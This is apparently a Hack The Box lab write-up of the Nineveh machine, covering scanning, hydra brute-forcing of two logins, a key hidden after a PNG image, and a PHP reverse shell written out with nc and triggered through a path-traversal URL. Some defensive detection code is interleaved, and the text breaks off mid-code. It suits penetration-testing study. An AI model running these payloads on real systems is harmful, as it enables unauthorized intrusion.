Nineveh

Ports scan

u505@kali:~/HTB/Machines/Nineveh$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.43
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-05-10 18:48:08 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 443/tcp on 10.10.10.43
Discovered open port 80/tcp on 10.10.10.43
u505@kali:~/HTB/Machines/Nineveh$ nmap -sC -sV 10.10.10.43
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 21:05 EDT
Nmap scan report for 10.10.10.43
Host is up (0.054s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds
u505@kali:~/HTB/Machines/Nineveh$ sslscan --show-certificate https://nineveh.htb
Version: 2.0.0-static
OpenSSL 1.1.1f-dev  xx XXX xxxx

Connected to 10.10.10.43
Testing SSL server nineveh.htb on port 443 using SNI name nineveh.htb
  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     disabled
TLSv1.0   enabled
TLSv1.1   enabled
TLSv1.2   enabled
TLSv1.3   disabled

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLSv1.2 not vulnerable to heartbleed
TLSv1.1 not vulnerable to heartbleed
TLSv1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 2048 bits
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 2048 bits
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 2048 bits
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 2048 bits
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256
Accepted  TLSv1.2  256 bits  AES256-SHA256
Accepted  TLSv1.2  128 bits  AES128-SHA256
Accepted  TLSv1.2  256 bits  AES256-SHA
Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.2  128 bits  AES128-SHA
Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA
Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.1  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.1  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.1  256 bits  AES256-SHA
Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.1  128 bits  AES128-SHA
Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA
Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.0  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.0  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.0  256 bits  AES256-SHA
Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA
Accepted  TLSv1.0  128 bits  AES128-SHA
Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA

  Server Key Exchange Group(s):
TLSv1.2  141 bits  sect283k1
TLSv1.2  141 bits  sect283r1
TLSv1.2  204 bits  sect409k1
TLSv1.2  204 bits  sect409r1
TLSv1.2  285 bits  sect571k1
TLSv1.2  285 bits  sect571r1
TLSv1.2  128 bits  secp256k1
TLSv1.2  128 bits  secp256r1 (NIST P-256)
TLSv1.2  192 bits  secp384r1 (NIST P-384)
TLSv1.2  260 bits  secp521r1 (NIST P-521)
TLSv1.2  128 bits  brainpoolP256r1
TLSv1.2  192 bits  brainpoolP384r1
TLSv1.2  256 bits  brainpoolP512r1

  Server Signature Algorithm(s):
TLSv1.2  rsa_pkcs1_sha1
TLSv1.2  dsa_sha1
TLSv1.2  ecdsa_sha1
TLSv1.2  rsa_pkcs1_sha224
TLSv1.2  dsa_sha224
TLSv1.2  ecdsa_sha224
TLSv1.2  rsa_pkcs1_sha256
TLSv1.2  dsa_sha256
TLSv1.2  ecdsa_secp256r1_sha256
TLSv1.2  rsa_pkcs1_sha384
TLSv1.2  dsa_sha384
TLSv1.2  ecdsa_secp384r1_sha384
TLSv1.2  rsa_pkcs1_sha512
TLSv1.2  dsa_sha512
TLSv1.2  ecdsa_secp521r1_sha512
  SSL Certificate:
Certificate blob:
-----BEGIN CERTIFICATE-----
[PEM body omitted]
-----END CERTIFICATE-----
Version: 2
Serial Number: dc:28:8e:b9:1a:8b:55:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: /C=GR/ST=Athens/L=Athens/O=HackTheBox Ltd/OU=Support/CN=nineveh.htb/emailAddress=admin@nineveh.htb
Not valid before: Jul  1 15:03:30 2017 GMT
Not valid after: Jul  1 15:03:30 2018 GMT
Subject: /C=GR/ST=Athens/L=Athens/O=HackTheBox Ltd/OU=Support/CN=nineveh.htb/emailAddress=admin@nineveh.htb
Public Key Algorithm: NULL
RSA Public Key: (2048 bit)
    RSA Public-Key: (2048 bit)
    Modulus:
        [modulus hex omitted]
    Exponent: 65537 (0x10001)
X509v3 Extensions:
    X509v3 Subject Key Identifier:
        87:46:12:7D:53:88:D3:95:B2:38:59:ED:1B:29:30:73:7F:CE:CE:B3
    X509v3 Authority Key Identifier:
        keyid:87:46:12:7D:53:88:D3:95:B2:38:59:ED:1B:29:30:73:7F:CE:CE:B3
    X509v3 Basic Constraints:
        CA:TRUE
Verify Certificate:
self signed certificate

  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048

Subject:  nineveh.htb
Issuer:   nineveh.htb

Not valid before: Jul  1 15:03:30 2017 GMT
Not valid after:  Jul  1 15:03:30 2018 GMT

Web server port 80

u505@kali:~/HTB/Machines/Nineveh$ curl http://nineveh.htb
<html><body><h1>It works!</h1>
 <p>This is the default web page for this server.</p>
 <p>The web server software is running but no content has been added, yet.</p>
 </body></html>

dirsearch

u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt,php" -f -t 50 -u http://nineveh.htb/

dirsearch v0.3.9
Extensions: js, html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 22974
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-22-22.log
Target: http://nineveh.htb/
[21:22:22] Starting:
[21:22:23] 403 - 291B - /.html
[21:22:25] 403 - 290B - /.php
[21:22:49] 403 - 292B - /icons/
[21:22:49] 200 - 178B - /index.html
[21:22:50] 200 - 83KB - /info.php/
[21:22:50] 200 - 83KB - /info.php
[21:23:09] 403 - 300B - /server-status/
Task Completed

The first search doesn't provide much information except the info.php page. A second dirsearch run with a larger wordlist and the txt and php extensions gives us more information.

u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,php" -f -t 50 -u http://nineveh.htb/

dirsearch v0.3.9
Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-35-35.log
Target: http://nineveh.htb/
[21:35:35] Starting:
[21:35:35] 403 - 290B - /.php
[21:35:36] 403 - 292B - /icons/
[21:35:37] 200 - 83KB - /info.php
[21:35:54] 200 - 68B - /department/
[21:43:45] 403 - 300B - /server-status/
Task Completed

Sqlmap

First, we check whether the login page is vulnerable to SQL injection.

u505@kali:~/HTB/Machines/Nineveh$ cat login.req
POST /department/login.php HTTP/1.1
Host: nineveh.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nineveh.htb/department/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close
Cookie: PHPSESSID=f3u4488a8dav1cajju1jcreis3
Upgrade-Insecure-Requests: 1

username=admin&password=admin
u505@kali:~/HTB/Machines/Nineveh$ sqlmap -r login.req
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.4#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:37:44 /2020-05-07/
[21:37:44] [INFO] parsing HTTP request from 'login.req'
[21:37:44] [INFO] testing connection to the target URL
[21:37:44] [INFO] checking if the target is protected by some kind of WAF/IPS
[21:37:45] [INFO] testing if the target URL content is stable
[21:37:45] [INFO] target URL content is stable
[21:37:45] [INFO] testing if POST parameter 'username' is dynamic
[21:37:45] [WARNING] POST parameter 'username' does not appear to be dynamic
[21:37:45] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[21:37:45] [INFO] testing for SQL injection on POST parameter 'username'
[21:37:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:37:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:37:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:37:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:37:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:37:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:37:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:37:48] [INFO] testing 'Generic inline queries'
[21:37:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:37:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:37:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:37:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:37:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:37:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:37:50] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[21:37:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:37:55] [WARNING] POST parameter 'username' does not seem to be injectable
[21:37:55] [INFO] testing if POST parameter 'password' is dynamic
[21:37:56] [WARNING] POST parameter 'password' does not appear to be dynamic
[21:37:56] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[21:37:56] [INFO] testing for SQL injection on POST parameter 'password'
[21:37:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:37:56] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:37:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:37:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:37:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:37:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:37:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:37:58] [INFO] testing 'Generic inline queries'
[21:37:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:37:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:37:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:37:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:38:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:38:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:38:01] [INFO] testing 'Oracle AND time-based blind'
[21:38:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:38:02] [WARNING] POST parameter 'password' does not seem to be injectable
[21:38:02] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 21:38:02 /2020-05-07/

We try again with a higher level and risk (which takes longer).

u505@kali:~/HTB/Machines/Nineveh$ sqlmap -r login.req --level 4 --risk 3
...
[21:55:40] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 21:55:40 /2020-05-07/

The results were similar, so the application does not appear to be vulnerable to SQL injection.

Network brute force

If we try to log in with the user admin, the system returns "Invalid password", but if we try with the user u505, the system returns "Invalid username". We can deduce that the user admin exists.

We try to brute force the login page with the user admin.

u505@kali:~/HTB/Machines/Nineveh$ hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt "http-post-form://nineveh.htb/department/login.php:username=admin&password=^PASS^:Invalid Password"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-07 22:31:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://nineveh.htb:80/department/login.php:username=admin&password=^PASS^:Invalid Password
[STATUS] 1858.00 tries/min, 1858 tries in 00:01h, 14342540 to do in 128:40h, 16 active
[80][http-post-form] host: nineveh.htb   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-07 22:33:32
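A run like the one above leaves an unmistakable trace in the web server's access log: thousands of POSTs per minute to one login URL from one client. The following is an added example (not from the original write-up) of the detection logic a defender would run over Apache combined-format log lines; the log lines it parses are constructed, and the threshold of ten POSTs per minute is an assumed tuning value.

```python
"""Flag brute-force bursts against a login endpoint in Apache access logs."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined log format, e.g.
# 10.10.14.21 - - [07/May/2020:22:31:10 -0400] "POST /department/login.php HTTP/1.1" 200 512
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_bursts(lines, path="/department/login.php", threshold=10, window_s=60):
    """Return {ip: peak number of POSTs to `path` inside any `window_s` window},
    listing only clients that reached `threshold` or more in one window."""
    recent = defaultdict(deque)   # ip -> POST timestamps still inside the window
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()            # drop timestamps that fell out of the window
        if len(q) >= threshold:
            peaks[rec["ip"]] = max(peaks.get(rec["ip"], 0), len(q))
    return peaks


def sample_log():
    """Constructed log: one normal visitor and one client posting 12 times in 12 s."""
    tmpl = '{ip} - - [07/May/2020:22:31:{sec:02d} -0400] "{m} {p} HTTP/1.1" {st} 512'
    lines = [
        tmpl.format(ip="10.10.14.5", sec=0, m="GET", p="/department/login.php", st=200),
        tmpl.format(ip="10.10.14.5", sec=3, m="POST", p="/department/login.php", st=200),
    ]
    for i in range(12):
        lines.append(tmpl.format(ip="10.10.14.21", sec=10 + i, m="POST",
                                 p="/department/login.php", st=200))
    return lines


if __name__ == "__main__":
    for ip, peak in find_bursts(sample_log()).items():
        print(f"{ip}: {peak} login POSTs within one minute")
```

At hydra's observed rate of about 1858 tries per minute the same client would trip this rule within the first second of the run.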

Web server port 443

u505@kali:~/HTB/Machines/Nineveh$ curl -k https://nineveh.htb
<center><img src="ninevehForAll.png" /></center>
u505@kali:~/HTB/Machines/Nineveh$ wget  --no-check-certificate https://nineveh.htb/ninevehForAll.png
--2020-05-07 21:14:08--  https://nineveh.htb/ninevehForAll.png
Resolving nineveh.htb (nineveh.htb)... 10.10.10.43
Connecting to nineveh.htb (nineveh.htb)|10.10.10.43|:443... connected.
WARNING: The certificate of ‘nineveh.htb’ is not trusted.
WARNING: The certificate of ‘nineveh.htb’ doesn't have a known issuer.
WARNING: The certificate of ‘nineveh.htb’ has expired.
The certificate has expired
HTTP request sent, awaiting response... 200 OK
Length: 560852 (548K) [image/png]
Saving to: ‘ninevehForAll.png’

ninevehForAll.png 100%[======================================>] 547.71K 1.29MB/s in 0.4s
2020-05-07 21:14:09 (1.29 MB/s) - ‘ninevehForAll.png’ saved [560852/560852]

Dirsearch

u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt,php" -f -t 50 -u https://nineveh.htb

dirsearch v0.3.9
Extensions: js, html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 22974
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-12-45.log
Target: https://nineveh.htb
[21:12:45] Starting:
[21:12:46] 403 - 291B - /.php
[21:12:46] 403 - 292B - /.html
[21:13:03] 200 - 11KB - /db/
[21:13:15] 403 - 293B - /icons/
[21:13:16] 200 - 49B - /index.html
[21:13:39] 403 - 301B - /server-status/
Task Completed

An extended search gives us more information.

u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,php" -f -t 50 -u https://nineveh.htb/

dirsearch v0.3.9
Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-35-22.log
Target: https://nineveh.htb/
[21:35:23] Starting:
[21:35:23] 403 - 291B - /.php
[21:35:24] 403 - 293B - /icons/
[21:35:31] 200 - 11KB - /db/
[21:45:00] 403 - 301B - /server-status/
[21:45:01] 200 - 71B - /secure_notes/
Task Completed

Secure_notes

An image appears.

The source code doesn't provide more information.

u505@kali:~/HTB/Machines/Nineveh$ curl -k https://nineveh.htb/secure_notes/
<html>
 <body>
 <center><img src=nineveh.png /></center>
 </body>
 </html>

Download of the image.

u505@kali:~/HTB/Machines/Nineveh$ wget  --no-check-certificate https://nineveh.htb/secure_notes/nineveh.png
--2020-05-07 21:28:55--  https://nineveh.htb/secure_notes/nineveh.png
Resolving nineveh.htb (nineveh.htb)... 10.10.10.43
Connecting to nineveh.htb (nineveh.htb)|10.10.10.43|:443... connected.
WARNING: The certificate of ‘nineveh.htb’ is not trusted.
WARNING: The certificate of ‘nineveh.htb’ doesn't have a known issuer.
WARNING: The certificate of ‘nineveh.htb’ has expired.
The certificate has expired
HTTP request sent, awaiting response... 200 OK
Length: 2891984 (2.8M) [image/png]
Saving to: ‘nineveh.png’

nineveh.png 100%[======================================>] 2.76M 645KB/s in 4.4s
2020-05-07 21:28:59 (639 KB/s) - ‘nineveh.png’ saved [2891984/2891984]

Some data has been appended after the end of the image (past the IEND chunk), in tar format.

u505@kali:~/HTB/Machines/Nineveh$ strings nineveh.png | tail -n 60
r)'es
IEND
secret/
0000755
0000041
0000041
00000000000
13126060277
012377
ustar
www-data
www-data
secret/nineveh.priv
0000600
0000041
0000041
00000003213
13126045656
014730
ustar
www-data
www-data
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
0000644
0000041
0000041
00000000620
13126060277
014541
ustar
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb

We save amrois' private key, although the ssh port is not reachable externally.
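The trick above (a tar archive glued onto a valid PNG) survives image viewers because decoders stop at the IEND chunk, so a defender wants a check that walks the chunk list and inspects whatever follows it. The following is an added example, not part of the original write-up: it finds the byte offset after IEND, tests the trailing bytes for a POSIX ustar header (the magic at offset 257 of the 512-byte block) and lists the archive members. The 1x1 PNG and the two-member tar it analyses are constructed inline.

```python
"""Detect and list a tar archive appended after a PNG's IEND chunk."""
import io
import struct
import tarfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_end_offset(data):
    """Offset just past the IEND chunk, or None if `data` is not a PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4          # header + chunk data + CRC
        if ctype == b"IEND":
            return pos
    return None                        # truncated: no IEND chunk found


def trailing_payload(data):
    """Bytes that follow the PNG's IEND chunk (b"" for a clean image)."""
    end = png_end_offset(data)
    return None if end is None else data[end:]


def is_ustar(blob):
    """POSIX tar headers carry the magic 'ustar' at offset 257 of the first block."""
    return len(blob) >= 512 and blob[257:262] == b"ustar"


def list_trailing_tar(data):
    """Member names of a tar archive appended to the PNG, or [] if there is none."""
    tail = trailing_payload(data)
    if not tail or not is_ustar(tail):
        return []
    with tarfile.open(fileobj=io.BytesIO(tail), mode="r:") as tf:
        return tf.getnames()


# --- constructed sample: a 1x1 PNG with a small tar archive glued on the end ---

def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def minimal_png():
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit greyscale
    idat = zlib.compress(b"\x00\x00")                     # filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def sample_with_hidden_tar():
    """Constructed stand-in for secure_notes/nineveh.png: image + secret/ tar."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, body in (("secret/nineveh.priv", b"[constructed key material]\n"),
                           ("secret/nineveh.pub", b"ssh-rsa [constructed]\n")):
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tf.addfile(info, io.BytesIO(body))
    return minimal_png() + buf.getvalue()


if __name__ == "__main__":
    img = sample_with_hidden_tar()
    tail = trailing_payload(img)
    print(f"{len(tail)} bytes after IEND, ustar header: {is_ustar(tail)}")
    print("hidden members:", list_trailing_tar(img))
```

The same walk flags any non-empty tail, so it also catches appended data that is not a tar archive; only the member listing is tar-specific.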

Db folder

u505@kali:~/HTB/Machines/Nineveh$ searchsploit phpliteadmin
----------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                   |  Path
                                                                 | (/usr/share/exploitdb/)
----------------------------------------------------------------- ----------------------------------------
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection                   | exploits/php/webapps/24044.txt
phpLiteAdmin - 'table' SQL Injection                             | exploits/php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities                      | exploits/php/webapps/37515.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities                    | exploits/php/webapps/39714.txt
----------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Nineveh$ searchsploit -m 24044
  Exploit: PHPLiteAdmin 1.9.3 - Remote PHP Code Injection
      URL: https://www.exploit-db.com/exploits/24044
     Path: /usr/share/exploitdb/exploits/php/webapps/24044.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Nineveh/24044.txt

Exploit 24044 is very promising: it allows embedding PHP code in SQLite databases, but we need to log into the application first.

u505@kali:~/HTB/Machines/Nineveh$ hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt "https-post-form://nineveh.htb/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-07 22:11:57
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-forms://nineveh.htb:443/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password
[STATUS] 1006.00 tries/min, 1006 tries in 00:01h, 14343392 to do in 237:38h, 16 active
[443][http-post-form] host: nineveh.htb   login: admin   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-07 22:13:20

Reverse shell

Create php file

Database creation.

Table creation.

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f"); ?>

In this field, we paste the PHP system command that opens a reverse shell.

The PHP file has been created at /var/tmp/reverse.php.

Start listener

u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Call reverse.php

If we click on the Notes link, some notes are appended at the bottom of the page. These notes seem to be read from a file.

Playing with the notes parameter, we are able to abuse it to open the file /etc/passwd.

With the following URL, we are able to call our reverse shell script.

http://nineveh.htb/department/manage.php?notes=/files/ninevehNotes.txt/../../var/tmp/reverse.php
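The URL above passes because the only thing checked is that the expected file name appears somewhere in the parameter, while the "../" segments after it are still honoured (this is an assumption: the write-up does not show manage.php's source, only that this payload worked). The following is an added example, not code from the page, showing that weak check beside a hardened one that maps the parameter onto an allow-listed file inside a fixed directory; NOTES_ROOT and ALLOWED_NOTES are assumed values.

```python
"""Weak substring check versus a path-confined, allow-listed notes lookup."""
import posixpath

# Assumed on-disk location of the notes directory; the write-up does not show it.
NOTES_ROOT = "/var/www/html/department/files"
ALLOWED_NOTES = {"ninevehNotes.txt"}


def naive_check(notes):
    """Substring check of the kind the traversal URL slips past (assumed behaviour)."""
    return "ninevehNotes" in notes


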